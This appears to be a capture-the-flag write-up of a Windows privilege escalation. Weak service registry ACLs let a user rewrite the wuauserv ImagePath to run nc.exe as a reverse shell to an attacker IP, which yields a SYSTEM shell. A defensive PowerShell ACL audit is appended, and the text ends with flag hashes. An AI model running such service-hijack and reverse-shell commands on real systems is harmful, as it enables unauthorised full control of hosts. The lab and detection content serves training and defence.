PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data Provider for Oracle
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data
BUILTIN\Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_4248c
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4248c
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_4afaf
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_80d08
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_ee306
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
BUILTIN\Users Allow -1610612736
BUILTIN\Users Allow ReadKey
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
BUILTIN\Users Allow -1610612736
BUILTIN\Users Allow ReadKey
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_4248c
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_4afaf
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_80d08
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_ee306
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863-2974-47D1-89E0-E507677AA14F}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863-2974-47D1-89E0-E507677AA14F}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
ABUSING SERVICES
I have a list of service keys over which Hector has full control. The service "wuauserv" is the one to use, as per the hint I received on the HTB Forum.
Windows wuauserv is the system service behind the Windows Update feature, and it runs only while Windows Update is active: the service runs for a couple of minutes, checks whether an update is in progress, and if none is, it stops itself.
*Evil-WinRM* PS C:\Users\Hector\Documents> Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
DependOnService : {rpcss}
Description : @%systemroot%\system32\wuaueng.dll,-106
DisplayName : @%systemroot%\system32\wuaueng.dll,-105
ErrorControl : 1
FailureActions : {128, 81, 1, 0…}
ImagePath : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName : LocalSystem
RequiredPrivileges : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType : 1
Start : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB : 167
SvcMemSoftLimitInMB : 88
Type : 32
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : wuauserv
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
If you remember the retired machine Helpline, I exploited the Windows print spooler service there to run my nc.exe. I am going to use the same approach on this machine.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> copy nc.exe C:\windows\system32\spool\drivers\color\nc.exe
*Evil-WinRM* PS C:\Users\Hector\Documents> reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.11 4444 -e cmd" /f
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.11 4444 -e cmd" /f
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Hector\Documents>
START LISTENING:
root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
START SERVICE
*Evil-WinRM* PS C:\Users\Hector\Documents> Start-Service wuauserv
Start-Service wuauserv
*Evil-WinRM* PS C:\Users\Hector\Documents> get-service wuauserv

Status   Name               DisplayName
------   ----               -----------
Stopped  wuauserv           Windows Update

*Evil-WinRM* PS C:\Users\Hector\Documents> start-service wuauserv
REVERSE SHELL AS ADMINISTRATOR
*Evil-WinRM* PS C:\Users\Hector\Documents> sc.exe query wuauserv

SERVICE_NAME: wuauserv
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\Hector\Documents> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------

*Evil-WinRM* PS C:\Users\Hector\Documents> taskkill.exe /f /pid 728
SUCCESS: The process with PID 728 has been terminated.
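As an added defensive check that is not part of the original writeup, the following PowerShell script enumerates every service key under HKLM and reports any principal outside a trusted set that holds write rights on the key, together with the ImagePath and the account the service runs as, which is exactly the pair the chain above abuses (a non-admin with FullControl rewrites ImagePath on a LocalSystem service). The trusted-principal list and the treatment of unmapped generic rights are my assumptions about a default install.

```powershell
# Added example, not from the original writeup: find service registry keys whose
# ACL lets an untrusted principal rewrite values such as ImagePath.
# Read access to the keys is enough to run the audit; remediation needs admin.

$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'

# Principals expected to hold write rights on service keys (assumption).
$TrustedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller',
    'CREATOR OWNER'
)

# Specific rights that permit changing a value. ReadKey (0x20019) shares no bit
# with this mask, so the many "Authenticated Users Allow ReadKey" entries in the
# listing are not reported.
$WriteMask = [int]([System.Security.AccessControl.RegistryRights]::SetValue -bor
                   [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                   [System.Security.AccessControl.RegistryRights]::Delete -bor
                   [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                   [System.Security.AccessControl.RegistryRights]::TakeOwnership)
# Unmapped generic rights appear as raw integers in Get-Acl output. The value
# -1610612736 (0xA0000000) in the listing is GENERIC_READ|GENERIC_EXECUTE, which
# is read-only; GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) are not.
$GenericWriteMask = 0x50000000

function Find-WeakServiceKeyAcl {
    foreach ($key in Get-ChildItem -Path $ServicesRoot -ErrorAction SilentlyContinue) {
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { continue }
        $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($TrustedPrincipals -contains $ace.IdentityReference.Value) { continue }
            $rights   = [int]$ace.RegistryRights
            $canWrite = (($rights -band $WriteMask) -ne 0) -or
                        (($rights -band $GenericWriteMask) -ne 0)
            if (-not $canWrite) { continue }
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                RunsAs    = $props.ObjectName      # LocalSystem for wuauserv
                ImagePath = $props.ImagePath       # the value that gets rewritten
            }
        }
    }
}

# Report first; the remediation below is left commented so the audit stays read-only.
$findings = Find-WeakServiceKeyAcl
$findings | Sort-Object Service | Format-Table -AutoSize
# foreach ($f in $findings) {
#     $path = Join-Path $ServicesRoot $f.Service
#     $acl  = Get-Acl -Path $path
#     $acl.Access | Where-Object { $_.IdentityReference.Value -eq $f.Principal } |
#         ForEach-Object { [void]$acl.RemoveAccessRule($_) }
#     Set-Acl -Path $path -AclObject $acl     # requires administrator rights
# }
```

On the box above this would list wuauserv (and the other keys in the dump) with Principal CONTROL\Hector, Rights FullControl and RunsAs LocalSystem; alongside the audit, alerting on System log event 7040/7045 style service configuration changes and on Sysmon registry events for ImagePath would catch the reg add step itself.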
user=>d8782dd01fb15b72c4b5ba77ef2d472b root=>8f8613f5b4da391f36ef11def4cec1b1
Author : Puckiestyle